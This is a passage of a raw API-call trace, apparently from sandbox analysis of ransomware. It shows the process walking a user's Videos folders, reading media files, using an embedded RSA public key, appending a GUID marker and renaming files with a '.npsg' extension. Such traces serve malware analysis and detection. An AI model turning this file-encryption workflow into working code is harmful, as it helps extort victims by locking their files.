lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x346fa10, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0238.573] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b88cd0 [0238.573] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.573] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7caa0 | out: hHeap=0x620000) returned 1 [0238.573] WriteFile (in: hFile=0x644, lpBuffer=0x3b88cd0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b88cd0*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0238.573] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88cd0 | out: hHeap=0x620000) returned 1 [0238.573] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.573] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0238.574] CloseHandle (hObject=0x644) returned 1 [0238.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x3b88cd0 [0238.575] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.575] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\kENlfga.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\kenlfga.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\kENlfga.avi.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\kenlfga.avi.npsg")) returned 1 [0238.576] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88cd0 | out: hHeap=0x620000) returned 1 [0238.576] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.576] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0238.577] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x70df58 | out: hHeap=0x620000) returned 1 [0238.578] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa9fb8b0, ftCreationTime.dwHighDateTime=0x1d5bcbd, ftLastAccessTime.dwLowDateTime=0xcf4314a0, ftLastAccessTime.dwHighDateTime=0x1d5bd9e, ftLastWriteTime.dwLowDateTime=0xcf4314a0, ftLastWriteTime.dwHighDateTime=0x1d5bd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NRaXHt", cAlternateFileName="")) returned 1 [0238.578] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.578] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a550 [0238.578] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a088 [0238.578] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a550 | out: hHeap=0x620000) returned 1 [0238.578] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.578] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ee4bc10, ftCreationTime.dwHighDateTime=0x1d5b940, ftLastAccessTime.dwLowDateTime=0xe2bdff10, ftLastAccessTime.dwHighDateTime=0x1d5b5b8, ftLastWriteTime.dwLowDateTime=0xe2bdff10, ftLastWriteTime.dwHighDateTime=0x1d5b5b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Y1FygDtm", cAlternateFileName="")) returned 1 [0238.578] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.578] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a550 [0238.578] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a110 [0238.578] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a550 | out: hHeap=0x620000) returned 1 [0238.578] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.578] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ee4bc10, ftCreationTime.dwHighDateTime=0x1d5b940, ftLastAccessTime.dwLowDateTime=0xe2bdff10, ftLastAccessTime.dwHighDateTime=0x1d5b5b8, ftLastWriteTime.dwLowDateTime=0xe2bdff10, ftLastWriteTime.dwHighDateTime=0x1d5b5b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Y1FygDtm", cAlternateFileName="")) returned 0 [0238.578] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0238.578] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0238.578] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0238.578] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0238.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7caa0 [0238.579] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0238.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.579] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.579] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.579] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.579] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.579] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0238.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0238.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0238.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0238.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0238.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0238.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0238.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.583] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\imXqHXuq\\") returned="imXqHXuq\\" [0238.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0238.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c5148 [0238.583] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0238.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b85f70 [0238.583] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0238.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18b0 [0238.583] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0238.583] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0238.584] PathFindFileNameW (pszPath="") returned="" [0238.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.584] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\imXqHXuq\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x296de6d0, ftCreationTime.dwHighDateTime=0x1d5c051, ftLastAccessTime.dwLowDateTime=0x6a5d2120, ftLastAccessTime.dwHighDateTime=0x1d5b61e, ftLastWriteTime.dwLowDateTime=0x6a5d2120, ftLastWriteTime.dwHighDateTime=0x1d5b61e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0238.585] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x296de6d0, ftCreationTime.dwHighDateTime=0x1d5c051, ftLastAccessTime.dwLowDateTime=0x6a5d2120, ftLastAccessTime.dwHighDateTime=0x1d5b61e, ftLastWriteTime.dwLowDateTime=0x6a5d2120, ftLastWriteTime.dwHighDateTime=0x1d5b61e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0238.585] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9374270, ftCreationTime.dwHighDateTime=0x1d5b88d, ftLastAccessTime.dwLowDateTime=0x9231a8b0, ftLastAccessTime.dwHighDateTime=0x1d5bcb8, ftLastWriteTime.dwLowDateTime=0x9231a8b0, ftLastWriteTime.dwHighDateTime=0x1d5bcb8, nFileSizeHigh=0x0, nFileSizeLow=0xc977, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bC0Q2ce6mtr4cZd.mkv", cAlternateFileName="BC0Q2C~1.MKV")) returned 1 [0238.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e5f8 [0238.585] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\imXqHXuq\\bC0Q2ce6mtr4cZd.mkv") returned=".mkv" [0238.585] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\imXqHXuq\\bC0Q2ce6mtr4cZd.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\imxqhxuq\\bc0q2ce6mtr4czd.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0238.586] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=51575) returned 1 [0238.586] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0238.589] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xc951, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.589] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0238.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.593] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xc977, lpOverlapped=0x0) returned 1 [0238.594] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0238.595] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.595] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.595] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0238.596] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0238.596] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0238.596] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0238.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0238.596] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0238.596] GetLastError () returned 0x0 [0238.596] CryptDestroyHash (hHash=0x33f0408) returned 1 [0238.596] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0238.596] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0238.596] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0238.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.596] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0238.597] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0238.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0238.597] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xc977, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.597] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0238.598] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.598] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0238.598] CloseHandle (hObject=0x644) returned 1 [0238.600] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\imXqHXuq\\bC0Q2ce6mtr4cZd.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\imxqhxuq\\bc0q2ce6mtr4czd.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\imXqHXuq\\bC0Q2ce6mtr4cZd.mkv.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\imxqhxuq\\bc0q2ce6mtr4czd.mkv.npsg")) returned 1 [0238.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88cd0 | out: hHeap=0x620000) returned 1 [0238.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.601] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0238.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e5f8 | out: hHeap=0x620000) returned 1 [0238.602] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9b22df0, ftCreationTime.dwHighDateTime=0x1d5beec, ftLastAccessTime.dwLowDateTime=0x83748f00, ftLastAccessTime.dwHighDateTime=0x1d5b6a9, ftLastWriteTime.dwLowDateTime=0x83748f00, 